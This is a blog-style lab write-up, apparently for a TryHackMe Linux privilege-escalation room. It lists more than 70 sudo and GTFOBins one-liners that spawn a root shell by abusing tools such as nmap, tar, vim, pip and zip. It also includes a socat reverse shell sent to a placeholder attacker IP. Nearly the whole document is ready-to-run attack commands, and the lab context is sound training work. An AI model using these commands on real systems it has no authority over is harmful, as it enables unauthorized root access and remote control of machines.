70+ WAYS TO GET ROOT — LINUX PRIVILEGE ESCALATION

Photo by Alex Chumak on Unsplash

This write-up is for getting the root shell on Linux and is based on the Linux Privesc Playground room on https://tryhackme.com/

Login to the box using the :- SSH Credentials given — check the room’s details on THM

Here is the list of all the ways which I could have think of at the time of solving this:

1. nmap --interactive; !sh

2. echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap --script=shell.nse

3. sudo awk ‘BEGIN {system(“/bin/sh”)}’

4. sudo find /home -exec /bin/bash \;

5. sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

6. sudo less /etc/hosts then !/bin/bash

7. sudo bash

8. sudo perl -e ‘exec “/bin/bash”;’

9. sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’

10. sudo man man
!/bin/bash

11. sudo vi
:!/bin/bash

12. sudo vim -c ‘!sh’

13. sudo env /bin/bash

14. sudo ftp
!/bin/bash

15. On Attacker Machine run:
socat file:`tty`,raw,echo=0 tcp-listen:1234
then on Target Machine run:
sudo socat exec:’sh -li’,pty,stderr,setsid,sigint,sane tcp:<ATTACKER_IP>:1234

16. sudo /bin/bash -p

17. sudo -s

18. sudo php -r “system(‘/bin/sh’);”

19. sudo strace -o /dev/null /bin/sh

20. sudo xargs -a /dev/null sh

21. sudo timeout --foreground 7d /bin/sh

22. sudo expect -c ‘spawn /bin/sh;interact’

23. sudo ionice /bin/sh

24. sudo /usr/bin/time /bin/sh

25. sudo taskset 1 /bin/sh

26. sudo flock -u / /bin/sh

27. sudo setarch $(arch) /bin/sh

28. sudo stdbuf -i0 /bin/sh

29. sudo rsync -e ‘sh -c “sh 0<&2 1>&2”’ 127.0.0.1:/dev/null

30. sudo pg /etc/profile
!/bin/sh

31. sudo nice /bin/sh

32. sudo gdb -nx -ex ‘!sh’ -ex quit

33. sudo dmsetup ls --exec ‘/bin/sh -s’

34. sudo start-stop-daemon -n $RANDOM -S -x /bin/sh

35. sudo logsave /dev/null /bin/sh -i

36. sudo sed -n ‘1e exec sh 1>&0’ /etc/hosts

37. sudo mount -o bind /bin/sh /bin/mount
sudo mount

38. sudo dash

39. sudo ksh

40. sudo ip netns add foo
sudo ip netns exec foo /bin/sh
sudo ip netns delete foo

41. TERM= sudo more /etc/profile
!/bin/sh

42. sudo zsh

43. sudo less /etc/profile
!/bin/sh

44. sudo busybox sh

45. sudo run-parts --new-session --regex ‘^sh$’ /bin

46. sudo unshare /bin/sh

47. sudo ltrace -L /bin/sh

48. sudo lua -e ‘os.execute(“/bin/sh”)’

49. sudo mawk ‘BEGIN {system(“/bin/sh”)}’

50. git help config
!/bin/sh

51. sudo service ../../bin/sh

52. sudo irb
exec ‘/bin/bash’

53. sudo pic -U
.PS
sh X sh X

54. sudo puppet apply -e “exec { ‘/bin/sh -c \”exec sh -i <$(tty) >$(tty) 2>$(tty)\”’: }”

55. sudo ssh -o ProxyCommand= ‘;sh 0<&2 1>&2’ x

56. sudo rlwrap /bin/sh

57. sudo ruby -e ‘exec “/bin/sh”’

58. sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr

59. TF=$(mktemp -u) then sudo zip $TF /etc/hosts -T -TT ‘sh #’
sudo rm $TF

60. sudo csh

61. TF=$(mktemp -d)
echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py
sudo easy_install $TF

62. sudo emacs -Q -nw --eval ‘(term “/bin/sh”)’

63. sudo tmux

64. sudo screen

65. sudo script -q /dev/null

66. TF=$(mktemp)
echo ‘sh 0<&2 1>&2’ > $TF
chmod +x “$TF”
sudo scp -S $TF x y:

67. sudo rvim -c ‘:py import os; os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’

68. TF=$(mktemp -d)
echo “import os; os.execl(‘/bin/sh’, ‘sh’, ‘-c’, ‘sh <$(tty) >$(tty) 2>$(tty)’)” > $TF/setup.py
sudo pip install $TF

69. sudo ash

70. sudo gawk ‘BEGIN {system(“/bin/sh”)}’

71. sudo nawk ‘BEGIN {system(“/bin/sh”)}’

72. vi :set shell=/bin/bash:shell

73. Kernel Exploits:

The flag is at location /root/flag.txt. Read and submit it when you are root 😀

Useful Resources used while solving this:

https://github.com/t0thkr1s/gtfo

https://gtfobins.github.io/

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why Product Driven Development (PDD) is Essential for Startups

How a script to save myself time became a core application at work

How to lose weight in a month 10 kg

Exploring the hidden architecture of your codebase

How to Add a Placemark Using Coordinates in Google Earth

Pin on the map

A Visual Designer’s 100 Framer Challenge [002]

“Hello World” in Flutter

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Write-up: Basic clickjacking with CSRF token protection @ PortSwigger Academy

Basic Pentesting — Process Report

picoCTF 2022: Cryptography writeups

Exploiting flask session — SmallMistakeBigMistake [heroctf 2022] by sudo_von